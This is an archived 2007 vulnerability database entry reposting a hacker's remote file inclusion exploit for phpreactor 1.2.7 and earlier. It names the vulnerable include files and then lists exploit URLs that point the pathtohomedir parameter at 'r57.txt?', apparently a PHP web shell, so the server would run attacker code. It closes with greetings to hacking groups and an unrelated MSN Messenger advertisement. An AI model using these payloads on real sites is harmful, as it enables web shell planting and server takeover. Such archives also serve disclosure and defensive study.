phpreactor <===1.2.7 remote file include

2007-06-01T00:00:00
ID SECURITYVULNS:DOC:17151
Type securityvulns
Reporter Securityvulns
Modified 2007-06-01T00:00:00

Description


phpreactor <===1.2.7 remote file include * url:http://sourceforge.net/projects/phpreactor/ * author:titanichacker (egy-virus) * contact: hack-teach.com & mohandko.com & tryag.com * bug in : * /inc/view.inc.php & inc/users.inc.php & inc/updatecms.inc.php & inc/polls.inc.php * include($pathtohomedir."/inc/cms.inc.php"); * * * exp===> * http://localhost/phpreactor/inc/view.inc.php?pathtohomedir=r57.txt? * http://localhost/phpreactor/inc/users.inc.php?pathtohomedir=r57.txt? * http://localhost/phpreactor/inc/updatecms.inc.php?pathtohomedir=r57.txt? * http://localhost/phpreactor/inc/polls.inc.php?pathtohomedir=r57.txt? * and more * thanx * cold-zero & mohandko & tryag & xp10 & drbaka & arb-hawk & kof2002 & ilw0rm *



Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/